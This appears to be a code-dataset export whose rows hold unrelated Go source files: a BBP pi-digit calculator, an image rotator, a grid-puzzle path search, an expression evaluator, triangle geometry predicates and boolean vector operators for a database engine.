code stringlengths 114 1.05M | path stringlengths 3 312 | quality_prob float64 0.5 0.99 | learning_prob float64 0.2 1 | filename stringlengths 3 168 | kind stringclasses 1 value |
|---|---|---|---|---|---|
package pi
import (
"fmt"
"math"
"math/big"
"github.com/go-logr/logr"
)
const (
	// The number of MR rounds to use when determining if the number is
	// probably a prime. A value of zero will apply a Baillie-PSW only test
	// and requires Go 1.8+.
	DEFAULT_MILLER_RABIN_ROUNDS = 0
)

var (
	// TWO is the increment used when stepping across odd prime candidates
	// in findNextPrime; allocated once to avoid per-step allocations.
	TWO = big.NewInt(2)
)

// Calculator object holds the options to use when calculating fractional digits
// of pi.
type Calculator struct {
	// The logr.Logger instance to use.
	logger logr.Logger
	// The number of Miller-Rabin rounds to use in Probably Prime calls.
	millerRabinRounds int
}

// Defines the function signature for Calculator options (functional-option
// pattern consumed by NewCalculator).
type CalculatorOption func(*Calculator)
// NewCalculator builds a Calculator with default settings (a discarded
// logger and DEFAULT_MILLER_RABIN_ROUNDS), then applies each supplied
// option in order.
func NewCalculator(options ...CalculatorOption) *Calculator {
	c := &Calculator{
		logger:            logr.Discard(),
		millerRabinRounds: DEFAULT_MILLER_RABIN_ROUNDS,
	}
	for _, apply := range options {
		apply(c)
	}
	return c
}
// WithLogger returns an option that swaps in the given logr.Logger for the
// calculator instance.
func WithLogger(logger logr.Logger) CalculatorOption {
	return func(calc *Calculator) { calc.logger = logger }
}
// WithMillerRabinRounds returns an option that sets how many Miller-Rabin
// rounds ProbablyPrime uses when determining if a number is prime.
func WithMillerRabinRounds(millerRabinRounds int) CalculatorOption {
	return func(calc *Calculator) { calc.millerRabinRounds = millerRabinRounds }
}
// Returns the inverse of x mod y
//
// Implemented as the iterative extended Euclidean algorithm: (u, v) track
// the remainder sequence while (c, a) track the Bezout coefficient for x.
// The result is normalised into the canonical range [0, y).
//
// NOTE(review): assumes x != 0 and gcd(x, y) == 1 — a zero x divides by
// zero on the first iteration; confirm callers (BBPDigits passes den
// reduced mod a^vmax) guarantee this.
func (calc *Calculator) invMod(x int64, y int64) int64 {
	l := calc.logger.V(2).WithValues("x", x, "y", y)
	l.Info("invMod: entered")
	var u, v, c, a int64 = x, y, 1, 0
	for {
		q := v / u
		// Simultaneously step the coefficient pair (c, a) ...
		t := c
		c = a - q*c
		a = t
		// ... and the remainder pair (u, v).
		t = u
		u = v - q*u
		v = t
		if u == 0 {
			break
		}
	}
	// Normalise the coefficient into [0, y).
	a = a % y
	if a < 0 {
		a = y + a
	}
	l.Info("invMod: exit", "a", a)
	return a
}
// powMod returns (a^b) mod m using binary exponentiation
// (square-and-multiply), processing the exponent bits from least to most
// significant.
func (c *Calculator) powMod(a int64, b int64, m int64) int64 {
	l := c.logger.V(2).WithValues("a", a, "b", b, "m", m)
	l.Info("powMod: entered")
	result := int64(1)
	for {
		if b&1 == 1 {
			result = (result * a) % m
		}
		if b >>= 1; b == 0 {
			break
		}
		a = (a * a) % m
	}
	l.Info("powMod: exit", "r", result)
	return result
}
// findNextPrime returns the smallest (probable) prime strictly greater than
// n, using ProbablyPrime with the configured Miller-Rabin round count.
func (c *Calculator) findNextPrime(n int64) int64 {
	l := c.logger.V(2).WithValues("n", n)
	l.Info("findNextPrime: entered")
	result := int64(2)
	if n >= 2 {
		// Start at the first odd number above n and step by two.
		candidate := n + 2
		if n%2 == 0 {
			candidate = n + 1
		}
		next := big.NewInt(candidate)
		for !next.ProbablyPrime(c.millerRabinRounds) {
			next.Add(next, TWO)
		}
		result = next.Int64()
	}
	l.Info("findNextPrime: exit", "result", result)
	return result
}
// Implements a BBP spigot algorithm to determine the nth and 8 following
// fractional decimal digits of pi at the specified zero-based offset, with
// the configured Calculator.
//
// The algorithm sums, over every prime a <= 2N, the contribution of the
// terms of a BBP-style series modulo av = a^vmax, then combines the
// fractional parts. All per-prime arithmetic is exact int64 modular math;
// only the final combination uses floats.
func (c *Calculator) BBPDigits(n uint64) string {
	l := c.logger.V(1).WithValues("n", n)
	l.Info("BBPDigits: enter")
	// N: number of series terms needed for n decimal digits plus guard
	// digits (conversion factor log(10)/log(2)).
	N := int64(float64(n+21) * math.Log(10) / math.Log(2))
	var sum float64 = 0
	var t int64
	// Iterate over primes a in (3 .. 2N]; findNextPrime supplies each
	// successive prime.
	for a := int64(3); a <= (2 * N); a = c.findNextPrime(a) {
		// vmax: largest exponent with a^vmax <= 2N; av = a^vmax is the
		// modulus for this prime's partial sum.
		vmax := int64(math.Log(float64(2*N)) / math.Log(float64(a)))
		av := int64(1)
		for i := int64(0); i < vmax; i++ {
			av = av * a
		}
		// s: partial sum mod av; num/den: running numerator/denominator mod
		// av with all factors of a removed; v: net exponent of a in
		// num/den; kq, kq2: counters detecting multiples of a in k and 2k-1.
		var s, num, den, v, kq, kq2 int64 = 0, 1, 1, 0, 1, 1
		for k := int64(1); k <= N; k++ {
			// Fold k into num, stripping any factors of a (tracked in v).
			t = k
			if kq >= a {
				for {
					t = t / a
					v--
					if t%a != 0 {
						break
					}
				}
				kq = 0
			}
			kq++
			num = (num * t) % av
			// Fold (2k-1) into den, stripping factors of a the same way.
			t = (2*k - 1)
			if kq2 >= a {
				if kq2 == a {
					for {
						t = t / a
						v++
						if t%a != 0 {
							break
						}
					}
				}
				kq2 -= a
			}
			den = (den * t) % av
			kq2 += 2
			// Only terms where a still divides the overall coefficient
			// (v > 0) contribute modulo av.
			if v > 0 {
				t = c.invMod(den, av)
				t = (t * num) % av
				t = (t * k) % av
				// Restore the remaining power of a: multiply by a^(vmax-v).
				for i := v; i < vmax; i++ {
					t = (t * a) % av
				}
				s += t
				if s >= av {
					s -= av
				}
			}
		}
		// Shift the partial sum by 10^n (mod av) to select digit position n,
		// then accumulate its fractional part.
		t = int64(c.powMod(10, int64(n), av))
		s = (s * t) % av
		sum = math.Mod(sum+float64(s)/float64(av), 1.0)
	}
	// First nine fractional decimal digits of the accumulated sum.
	result := fmt.Sprintf("%09d", int(sum*1e9))
	l.Info("BBPDigits: exit", "result", result)
	return result
}
// Implements a BBP spigot algorithm to determine the nth and 8 following
// fractional decimal digits of pi at the specified zero-based offset, with
// a default Calculator instance.
func BBPDigits(n uint64) string {
return NewCalculator().BBPDigits(n)
} | v2/pi.go | 0.707203 | 0.404919 | pi.go | starcoder |
package imager
import (
"image"
"image/color"
"math"
)
// RotateImager wraps an image.Image and presents it rotated by the given
// angle about the pivot point (Dx()/2, Dy()/2) of the source bounds.
type RotateImager struct {
	img    image.Image // source image being rotated
	radian float64     // rotation angle, in radians
}
// ColorModel reports the color model of the wrapped source image.
func (ri *RotateImager) ColorModel() color.Model {
	src := ri.img
	return src.ColorModel()
}
// Bounds returns the axis-aligned bounding rectangle of the source bounds
// after rotating its four corners about the pivot point.
//
// NOTE(review): the pivot (Dx()/2, Dy()/2) equals the image centre only
// when the source bounds start at (0, 0) — confirm that assumption holds
// for all inputs.
func (ri *RotateImager) Bounds() image.Rectangle {
	src := ri.img.Bounds()
	px, py := src.Dx()/2, src.Dy()/2
	ax, ay := ri.rotatePoint(px, py, src.Min.X, src.Min.Y, ri.radian)
	bx, by := ri.rotatePoint(px, py, src.Max.X, src.Min.Y, ri.radian)
	cx, cy := ri.rotatePoint(px, py, src.Max.X, src.Max.Y, ri.radian)
	dx, dy := ri.rotatePoint(px, py, src.Min.X, src.Max.Y, ri.radian)
	return image.Rect(
		min(ax, bx, cx, dx), min(ay, by, cy, dy),
		max(ax, bx, cx, dx), max(ay, by, cy, dy),
	)
}
// At samples the source pixel that maps onto (x, y) by applying the inverse
// rotation (negative angle) about the pivot point.
func (ri *RotateImager) At(x, y int) color.Color {
	src := ri.img.Bounds()
	px, py := src.Dx()/2, src.Dy()/2
	sx, sy := ri.rotatePoint(px, py, x, y, -ri.radian)
	return ri.img.At(sx, sy)
}
// rotatePoint rotates the point (x, y) by angle r (radians) about the pivot
// (x0, y0) and returns the resulting integer coordinates.
//
// It works in polar form: r0 is the angle of the input point around the
// pivot (using this file's own quadrant convention, see the branch mapping
// below), r1 = modRad(r0 + r) is the rotated angle, and the distance to the
// pivot is preserved. modRad and distance are defined elsewhere in this
// package.
//
// NOTE(review): the final dispatch uses strict inequalities, so a rotated
// angle landing exactly on 0, Pi/2, Pi or 3*Pi/2 falls through every branch
// and returns (0, 0) instead of the rotated point — confirm whether these
// axis-aligned results can occur in practice.
func (ri *RotateImager) rotatePoint(x0, y0 int, x, y int, r float64) (int, int) {
	var r0 float64
	// Determine r0, handling axis-aligned inputs explicitly so Atan never
	// divides by zero.
	if x == x0 && y == y0 {
		// The pivot itself is a fixed point of the rotation.
		return x, y
	} else if x == x0 {
		if y < y0 {
			r0 = math.Pi / 2
		} else {
			r0 = math.Pi * 3 / 2
		}
	} else if y == y0 {
		if x < x0 {
			r0 = 0
		} else {
			r0 = math.Pi
		}
	} else {
		// General case: base angle from Atan, then adjust per quadrant
		// (the first quadrant of this convention keeps r0 unchanged).
		r0 = math.Abs(math.Atan(float64(y-y0) / float64(x-x0)))
		if x < x0 && y < y0 {
		} else if x > x0 && y < y0 {
			r0 = math.Pi - r0
		} else if x > x0 && y > y0 {
			r0 = math.Pi + r0
		} else if x < x0 && y > y0 {
			r0 = math.Pi*2 - r0
		}
	}
	r1 := modRad(r0 + r)
	// Defensive re-normalisation into [0, 2*Pi); presumably redundant after
	// modRad — confirm against its definition.
	for r1 > math.Pi*2 {
		r1 = r1 - math.Pi*2
	}
	d := distance(x, y, x0, y0)
	x1, y1 := 0, 0
	// Map the rotated polar coordinates back to integers, one quadrant at a
	// time (mirroring the sign convention used when computing r0).
	if 0 < r1 && r1 < math.Pi/2 {
		x1 = x0 - int(math.Cos(r1)*d)
		y1 = y0 - int(math.Sin(r1)*d)
	} else if math.Pi/2 < r1 && r1 < math.Pi {
		r1 = math.Pi - r1
		x1 = x0 + int(math.Cos(r1)*d)
		y1 = y0 - int(math.Sin(r1)*d)
	} else if math.Pi < r1 && r1 < math.Pi*3/2 {
		r1 = r1 - math.Pi
		x1 = x0 + int(math.Cos(r1)*d)
		y1 = y0 + int(math.Sin(r1)*d)
	} else if math.Pi*3/2 < r1 && r1 < math.Pi*2 {
		r1 = math.Pi*2 - r1
		x1 = x0 - int(math.Cos(r1)*d)
		y1 = y0 + int(math.Sin(r1)*d)
	}
	return x1, y1
}
package solve
import (
gs "github.com/deanveloper/gridspech-go"
)
// PathsIter returns a channel of direct paths from start to end.
// These paths will:
//  1. never contain a goal tile that isn't start or end.
//  2. never make a path that would cause start or end to become invalid Goal tiles.
//  3. have the same Color as start.
//
// The search runs in a goroutine and the channel is closed once every path
// has been produced. If either endpoint is already known (not in
// UnknownTiles) and its color differs from the requested color, no paths
// are emitted.
func (g GridSolver) PathsIter(start, end gs.TileCoord, color gs.TileColor) <-chan gs.TileSet {
	pathIter := make(chan gs.TileSet)
	go func() {
		defer close(pathIter)
		startTile, endTile := *g.Grid.TileAtCoord(start), *g.Grid.TileAtCoord(end)
		// A known endpoint must already carry the requested color.
		if !g.UnknownTiles.Has(start) && color != startTile.Data.Color {
			return
		}
		if !g.UnknownTiles.Has(end) && color != endTile.Data.Color {
			return
		}
		g.dfsDirectPaths(color, startTile, endTile, gs.NewTileCoordSet(start), pathIter)
	}()
	return pathIter
}
// dfsDirectPaths recursively extends path (the coordinates visited so far,
// ending at prev) toward end, sending every completed path on ch with all
// its tiles recolored to color.
//
// we do not iterate in any particular order since it does not matter.
// this function will only create direct paths, aka ones which would satisfy
// a Goal tile.
func (g GridSolver) dfsDirectPaths(color gs.TileColor, prev, end gs.Tile, path gs.TileCoordSet, ch chan<- gs.TileSet) {
	// possible next tiles include unknown tiles, and tiles of the target color
	possibleNext := g.Grid.NeighborSetWith(prev.Coord, func(o gs.Tile) bool {
		return !path.Has(o.Coord) && (g.UnknownTiles.Has(o.Coord) || o.Data.Color == color)
	})
	for _, next := range possibleNext.Slice() {
		// prev's neighbors we _know_ are same color (including those that are part of the path)
		prevNeighborsSameColor := g.Grid.NeighborSetWith(prev.Coord, func(o gs.Tile) bool {
			knownSameColor := (o.Data.Color == color && !g.UnknownTiles.Has(o.Coord))
			partOfPath := path.Has(o.Coord) || o.Coord == next.Coord
			return knownSameColor || partOfPath
		})
		// make sure that we never have an invalid path:
		// a path tile may have at most 2 same-colored neighbors, and a Goal
		// tile at most 1.
		if prevNeighborsSameColor.Len() > 2 {
			continue
		}
		if prev.Data.Type == gs.TypeGoal && prevNeighborsSameColor.Len() > 1 {
			continue
		}
		// Rule 1: no goal tiles in the interior of the path.
		if next.Data.Type == gs.TypeGoal && next.Coord != end.Coord {
			continue
		}
		// we found a possible solution
		if next == end {
			// make sure the goal only has 1 neighbor we know is the same color
			if end.Data.Type == gs.TypeGoal {
				endNeighbors := g.Grid.NeighborSetWith(end.Coord, func(o gs.Tile) bool {
					return (o.Data.Color == color && !g.UnknownTiles.Has(o.Coord)) || path.Has(o.Coord)
				})
				if endNeighbors.Len() > 1 {
					continue
				}
			}
			// Emit the completed path with every tile recolored to color.
			finalPath := path.ToTileSet(func(t gs.TileCoord) gs.Tile {
				tileCopy := *g.Grid.TileAtCoord(t)
				tileCopy.Data.Color = color
				return tileCopy
			})
			next.Data.Color = color
			finalPath.Add(next)
			ch <- finalPath
			continue
		}
		// Otherwise extend the path with next and keep searching.
		var nextPath gs.TileCoordSet
		nextPath.Merge(path)
		nextPath.Add(next.Coord)
		// RECURSION
		g.dfsDirectPaths(color, next, end, nextPath, ch)
	}
}
package puzzle
// parse and evaluate mathematical expressions
// precedence by power, division, multiplication, addition, and subtraction
import (
"fmt"
"math"
"strconv"
"strings"
"github.com/dockerian/go-coding/ds/stack"
u "github.com/dockerian/go-coding/utils"
)
var (
	// operators lists every token recognised as a binary operator.
	operators = []string{
		"+",
		"-",
		"*",
		"/",
		"^",
	}
	// operatorPriority ranks operators; a higher value binds tighter.
	// Per the package comment this file deliberately gives each operator a
	// distinct rank (power, division, multiplication, then the additive
	// operators). NOTE(review): "-" ranks above "+" here, which is unusual
	// precedence — confirm this matches the intended semantics.
	operatorPriority = map[string]int{
		"+": 1,
		"-": 2,
		"*": 3,
		"/": 4,
		"^": 5,
	}
)
// eval parses and evaluates the space-separated infix expression s using a
// fresh Eval instance.
func eval(s string) (float64, error) {
	return NewEval(s).eval()
}
// Eval struct is a string stack implementation: it evaluates a
// space-separated infix expression using one stack of pending operators and
// one stack of operand tokens.
type Eval struct {
	expression string    // space-separated infix expression to evaluate
	operators  stack.Str // pending operator tokens
	operands   stack.Str // pending operand tokens (numbers as strings)
}
// NewEval returns a new Eval instance for the given space-separated
// expression, with empty operator and operand stacks.
func NewEval(e string) *Eval {
	ev := new(Eval)
	ev.expression = e
	ev.operators = stack.Str{}
	ev.operands = stack.Str{}
	return ev
}
// calc pops one operator and its two operands (right then left), evaluates
// the operation, and returns the result formatted as a decimal string. A
// lone operand (empty operator and left operand) is returned unchanged.
func (e *Eval) calc() (string, error) {
	op := e.operators.Pop()
	right := e.operands.Pop()
	left := e.operands.Pop()
	if op == "" && left == "" {
		return right, nil
	}
	value, err := evaluate(op, left, right)
	u.Debug("calc: '%s' %s '%s' == %v \n", left, op, right, value)
	if err != nil {
		return "", err
	}
	return fmt.Sprintf("%f", value), nil
}
// eval evaluates the space-separated infix expression with a classic
// two-stack (shunting-yard style) algorithm: operands are pushed as they
// arrive, and an incoming operator first forces evaluation of every stacked
// operator of strictly higher priority.
//
// Fix: the previous implementation captured the top-of-stack priority once
// per token and kept using that stale value while popping, so a single
// lower-priority token could drain operators that should have stayed
// stacked (e.g. "2 + 3 ^ 2 * 4" was grouped as (2 + 3^2) * 4). The
// priority is now re-read from the current stack top on every pop.
func (e *Eval) eval() (float64, error) {
	tokens := strings.Split(e.expression, " ")
	u.Debug("eval: '%v'\n", e.expression)
	for _, token := range tokens {
		priority, isOperator := operatorPriority[token]
		if !isOperator {
			e.operands.Push(token)
			continue
		}
		// Evaluate while the operator currently on top binds strictly
		// tighter than the incoming token; equal priorities are left
		// stacked (preserving the original behaviour).
		for !e.operators.IsEmpty() && priority < operatorPriority[e.operators.Peek()] {
			result, err := e.calc()
			if err != nil {
				return 0.0, err
			}
			e.operands.Push(result)
		}
		e.operators.Push(token)
	}
	// Drain whatever operators remain.
	for !e.operators.IsEmpty() {
		result, err := e.calc()
		if err != nil {
			return 0.0, err
		}
		e.operands.Push(result)
	}
	return strconv.ParseFloat(e.operands.Peek(), 64)
}
func evaluate(op, a, b string) (float64, error) {
var result float64
if a == "" {
a = "0.0" // allow 1st operand to be empty
}
fa, err1 := strconv.ParseFloat(a, 64)
if err1 != nil {
return result, fmt.Errorf("cannot parse '%v' to float64: %v", a, err1)
}
fb, err2 := strconv.ParseFloat(b, 64)
if err2 != nil {
return result, fmt.Errorf("cannot parse '%v' to float64: %v", b, err2)
}
if _, ok := operatorPriority[op]; !ok {
return result, fmt.Errorf("unknown operator '%v'", op)
}
switch op {
case "+":
result = fa + fb
case "-":
result = fa - fb
case "*":
result = fa * fb
case "/":
result = fa / fb
case "^":
result = math.Pow(fa, fb)
default:
}
return result, nil
} | puzzle/eval.go | 0.682362 | 0.402979 | eval.go | starcoder |
package quadedge
import (
"github.com/go-spatial/geom"
)
/*
TrianglePredicate contains algorithms for computing values and predicates
associated with triangles. For some algorithms extended-precision
implementations are provided, which are more robust (i.e. they produce correct
answers in more cases). Also, some more robust formulations of some algorithms
are provided, which utilize normalization to the origin.
Author <NAME>
Ported to Go by <NAME>
The empty struct gives us a "static" TrianglePredicate namespace.
*/
type trianglePredicate struct{}

// TrianglePredicate is the shared namespace value through which the
// predicate methods are invoked.
var TrianglePredicate trianglePredicate
/**
* Tests if a point is inside the circle defined by
* the triangle with vertices a, b, c (oriented counter-clockwise).
* This test uses simple
* double-precision arithmetic, and thus may not be robust.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
* @return true if this point is inside the circle defined by the points a, b, c
public static boolean isInCircleNonRobust(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
boolean isInCircle =
(a.x * a.x + a.y * a.y) * triArea(b, c, p)
- (b.x * b.x + b.y * b.y) * triArea(a, c, p)
+ (c.x * c.x + c.y * c.y) * triArea(a, b, p)
- (p.x * p.x + p.y * p.y) * triArea(a, b, c)
> 0;
return isInCircle;
}
*/
/*
IsInCircleNormalized Tests if a point is inside the circle defined by the
triangle with vertices a, b, c (oriented counter-clockwise). This test uses
simple double-precision arithmetic, and thus is not 100% robust. However, by
using normalization to the origin it provides improved robustness and
increased performance.
Based on code by J.R.Shewchuk.
a - a vertex of the triangle
b - a vertex of the triangle
c - a vertex of the triangle
p - the point to test
Returns true if this point is inside the circle defined by the points a, b, c
*/
func (_ trianglePredicate) IsInCircleNormalized(a geom.Pointer, b geom.Pointer, c geom.Pointer, p geom.Pointer) bool {
	// Translate every vertex so p becomes the origin; the in-circle test
	// then reduces to the sign of a 3x3 determinant.
	axy, bxy, cxy, pxy := a.XY(), b.XY(), c.XY(), p.XY()
	adx, ady := axy[0]-pxy[0], axy[1]-pxy[1]
	bdx, bdy := bxy[0]-pxy[0], bxy[1]-pxy[1]
	cdx, cdy := cxy[0]-pxy[0], cxy[1]-pxy[1]
	// Cofactors of the determinant expansion.
	abdet := adx*bdy - bdx*ady
	bcdet := bdx*cdy - cdx*bdy
	cadet := cdx*ady - adx*cdy
	// "Lifted" coordinates: squared distances from p to each vertex.
	alift := adx*adx + ady*ady
	blift := bdx*bdx + bdy*bdy
	clift := cdx*cdx + cdy*cdy
	return alift*bcdet+blift*cadet+clift*abdet > 0
}
/**
* Computes twice the area of the oriented triangle (a, b, c), i.e., the area is positive if the
* triangle is oriented counterclockwise.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
private static double triArea(Coordinate a, Coordinate b, Coordinate c) {
return (b.x - a.x) * (c.y - a.y)
- (b.y - a.y) * (c.x - a.x);
}
*/
/*
IsInCircleRobust Tests if a point is inside the circle defined by the triangle
with vertices a, b, c (oriented counter-clockwise). This method uses more
robust computation.
a - a vertex of the triangle
b - a vertex of the triangle
c - a vertex of the triangle
p - the point to test
Returns true if this point is inside the circle defined by the points a, b, c
*/
func (tp trianglePredicate) IsInCircleRobust(a geom.Pointer, b geom.Pointer, c geom.Pointer, p geom.Pointer) bool {
	// Delegates to the normalized formulation, the most robust
	// double-precision variant currently ported.
	return tp.IsInCircleNormalized(a, b, c, p)
}
/**
* Tests if a point is inside the circle defined by
* the triangle with vertices a, b, c (oriented counter-clockwise).
* The computation uses {@link DD} arithmetic for robustness.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
* @return true if this point is inside the circle defined by the points a, b, c
public static boolean isInCircleDDSlow(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
DD px = DD.valueOf(p.x);
DD py = DD.valueOf(p.y);
DD ax = DD.valueOf(a.x);
DD ay = DD.valueOf(a.y);
DD bx = DD.valueOf(b.x);
DD by = DD.valueOf(b.y);
DD cx = DD.valueOf(c.x);
DD cy = DD.valueOf(c.y);
DD aTerm = (ax.multiply(ax).add(ay.multiply(ay)))
.multiply(triAreaDDSlow(bx, by, cx, cy, px, py));
DD bTerm = (bx.multiply(bx).add(by.multiply(by)))
.multiply(triAreaDDSlow(ax, ay, cx, cy, px, py));
DD cTerm = (cx.multiply(cx).add(cy.multiply(cy)))
.multiply(triAreaDDSlow(ax, ay, bx, by, px, py));
DD pTerm = (px.multiply(px).add(py.multiply(py)))
.multiply(triAreaDDSlow(ax, ay, bx, by, cx, cy));
DD sum = aTerm.subtract(bTerm).add(cTerm).subtract(pTerm);
boolean isInCircle = sum.doubleValue() > 0;
return isInCircle;
}
*/
/**
* Computes twice the area of the oriented triangle (a, b, c), i.e., the area
* is positive if the triangle is oriented counterclockwise.
* The computation uses {@link DD} arithmetic for robustness.
*
* @param ax the x ordinate of a vertex of the triangle
* @param ay the y ordinate of a vertex of the triangle
* @param bx the x ordinate of a vertex of the triangle
* @param by the y ordinate of a vertex of the triangle
* @param cx the x ordinate of a vertex of the triangle
* @param cy the y ordinate of a vertex of the triangle
public static DD triAreaDDSlow(DD ax, DD ay,
DD bx, DD by, DD cx, DD cy) {
return (bx.subtract(ax).multiply(cy.subtract(ay)).subtract(by.subtract(ay)
.multiply(cx.subtract(ax))));
}
public static boolean isInCircleDDFast(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
DD aTerm = (DD.sqr(a.x).selfAdd(DD.sqr(a.y)))
.selfMultiply(triAreaDDFast(b, c, p));
DD bTerm = (DD.sqr(b.x).selfAdd(DD.sqr(b.y)))
.selfMultiply(triAreaDDFast(a, c, p));
DD cTerm = (DD.sqr(c.x).selfAdd(DD.sqr(c.y)))
.selfMultiply(triAreaDDFast(a, b, p));
DD pTerm = (DD.sqr(p.x).selfAdd(DD.sqr(p.y)))
.selfMultiply(triAreaDDFast(a, b, c));
DD sum = aTerm.selfSubtract(bTerm).selfAdd(cTerm).selfSubtract(pTerm);
boolean isInCircle = sum.doubleValue() > 0;
return isInCircle;
}
public static DD triAreaDDFast(
Coordinate a, Coordinate b, Coordinate c) {
DD t1 = DD.valueOf(b.x).selfSubtract(a.x)
.selfMultiply(
DD.valueOf(c.y).selfSubtract(a.y));
DD t2 = DD.valueOf(b.y).selfSubtract(a.y)
.selfMultiply(
DD.valueOf(c.x).selfSubtract(a.x));
return t1.selfSubtract(t2);
}
public static boolean isInCircleDDNormalized(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
DD adx = DD.valueOf(a.x).selfSubtract(p.x);
DD ady = DD.valueOf(a.y).selfSubtract(p.y);
DD bdx = DD.valueOf(b.x).selfSubtract(p.x);
DD bdy = DD.valueOf(b.y).selfSubtract(p.y);
DD cdx = DD.valueOf(c.x).selfSubtract(p.x);
DD cdy = DD.valueOf(c.y).selfSubtract(p.y);
DD abdet = adx.multiply(bdy).selfSubtract(bdx.multiply(ady));
DD bcdet = bdx.multiply(cdy).selfSubtract(cdx.multiply(bdy));
DD cadet = cdx.multiply(ady).selfSubtract(adx.multiply(cdy));
DD alift = adx.multiply(adx).selfAdd(ady.multiply(ady));
DD blift = bdx.multiply(bdx).selfAdd(bdy.multiply(bdy));
DD clift = cdx.multiply(cdx).selfAdd(cdy.multiply(cdy));
DD sum = alift.selfMultiply(bcdet)
.selfAdd(blift.selfMultiply(cadet))
.selfAdd(clift.selfMultiply(abdet));
boolean isInCircle = sum.doubleValue() > 0;
return isInCircle;
}
*/
/**
* Computes the inCircle test using distance from the circumcentre.
* Uses standard double-precision arithmetic.
* <p>
* In general this doesn't
* appear to be any more robust than the standard calculation. However, there
* is at least one case where the test point is far enough from the
* circumcircle that this test gives the correct answer.
* <pre>
* LINESTRING
* (1507029.9878 518325.7547, 1507022.1120341457 518332.8225183258,
* 1507029.9833 518325.7458, 1507029.9896965567 518325.744909031)
* </pre>
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
* @return true if this point is inside the circle defined by the points a, b, c
public static boolean isInCircleCC(Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
Coordinate cc = Triangle.circumcentre(a, b, c);
double ccRadius = a.distance(cc);
double pRadiusDiff = p.distance(cc) - ccRadius;
return pRadiusDiff <= 0;
}
*/
/**
* Checks if the computed value for isInCircle is correct, using
* double-double precision arithmetic.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
private static void checkRobustInCircle(Coordinate a, Coordinate b, Coordinate c,
Coordinate p)
{
boolean nonRobustInCircle = isInCircleNonRobust(a, b, c, p);
boolean isInCircleDD = TrianglePredicate.isInCircleDDSlow(a, b, c, p);
boolean isInCircleCC = TrianglePredicate.isInCircleCC(a, b, c, p);
Coordinate circumCentre = Triangle.circumcentre(a, b, c);
System.out.println("p radius diff a = "
+ Math.abs(p.distance(circumCentre) - a.distance(circumCentre))
/ a.distance(circumCentre));
if (nonRobustInCircle != isInCircleDD || nonRobustInCircle != isInCircleCC) {
System.out.println("inCircle robustness failure (double result = "
+ nonRobustInCircle
+ ", DD result = " + isInCircleDD
+ ", CC result = " + isInCircleCC + ")");
System.out.println(WKTWriter.toLineString(new CoordinateArraySequence(
new Coordinate[] { a, b, c, p })));
System.out.println("Circumcentre = " + WKTWriter.toPoint(circumCentre)
+ " radius = " + a.distance(circumCentre));
System.out.println("p radius diff a = "
+ Math.abs(p.distance(circumCentre)/a.distance(circumCentre) - 1));
System.out.println("p radius diff b = "
+ Math.abs(p.distance(circumCentre)/b.distance(circumCentre) - 1));
System.out.println("p radius diff c = "
+ Math.abs(p.distance(circumCentre)/c.distance(circumCentre) - 1));
System.out.println();
}
}
}
*/ | planar/triangulate/quadedge/trianglepredicate.go | 0.923825 | 0.736827 | trianglepredicate.go | starcoder |
package operator
import (
"github.com/matrixorigin/matrixone/pkg/container/nulls"
"github.com/matrixorigin/matrixone/pkg/container/vector"
"github.com/matrixorigin/matrixone/pkg/vm/process"
)
// ColAndCol computes the element-wise logical AND of two bool column
// vectors, merging both operands' null bitmaps into the result.
func ColAndCol(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	lvs, rvs := lv.Col.([]bool), rv.Col.([]bool)
	vec, err := proc.AllocVector(lv.Typ, int64(len(lvs)))
	if err != nil {
		return nil, err
	}
	out := make([]bool, len(lvs))
	for i, lb := range lvs {
		out[i] = lb && rvs[i]
	}
	nulls.Or(lv.Nsp, rv.Nsp, vec.Nsp)
	vector.SetCol(vec, out)
	return vec, nil
}
// ColAndConst computes the element-wise AND of a bool column with a
// non-null scalar bool, merging both operands' null bitmaps into the
// result.
func ColAndConst(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	lvs, rvs := lv.Col.([]bool), rv.Col.([]bool)
	vec, err := proc.AllocVector(lv.Typ, int64(len(lvs)))
	if err != nil {
		return nil, err
	}
	scalar := rvs[0]
	out := make([]bool, len(lvs))
	for i, lb := range lvs {
		out[i] = lb && scalar
	}
	nulls.Or(lv.Nsp, rv.Nsp, vec.Nsp)
	vector.SetCol(vec, out)
	return vec, nil
}
// ColAndNull computes column AND NULL: the result column is all-false with
// every row marked null.
//
// NOTE(review): strict SQL three-valued logic would keep `false AND NULL`
// as false; this implementation nulls every row — confirm this matches the
// engine's convention for scalar-null operands.
func ColAndNull(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	lvs := lv.Col.([]bool)
	vec, err := proc.AllocVector(lv.Typ, int64(len(lvs)))
	if err != nil {
		return nil, err
	}
	out := make([]bool, len(lvs))
	for i := range lvs {
		nulls.Add(vec.Nsp, uint64(i))
	}
	vector.SetCol(vec, out)
	return vec, nil
}
// ConstAndCol computes scalar AND column; AND is commutative, so it flips
// the operands and reuses ColAndConst.
func ConstAndCol(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	return ColAndConst(rv, lv, proc)
}
// ConstAndConst computes the AND of two non-null scalar bool vectors,
// yielding a scalar result.
func ConstAndConst(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	la, ra := lv.Col.([]bool), rv.Col.([]bool)
	out := proc.AllocScalarVector(lv.Typ)
	vector.SetCol(out, []bool{la[0] && ra[0]})
	return out, nil
}
// ConstAndNull computes scalar AND NULL, which is always a scalar null.
func ConstAndNull(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	return proc.AllocScalarNullVector(lv.Typ), nil
}

// NullAndCol computes NULL AND column by flipping the operands.
func NullAndCol(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	return ColAndNull(rv, lv, proc)
}

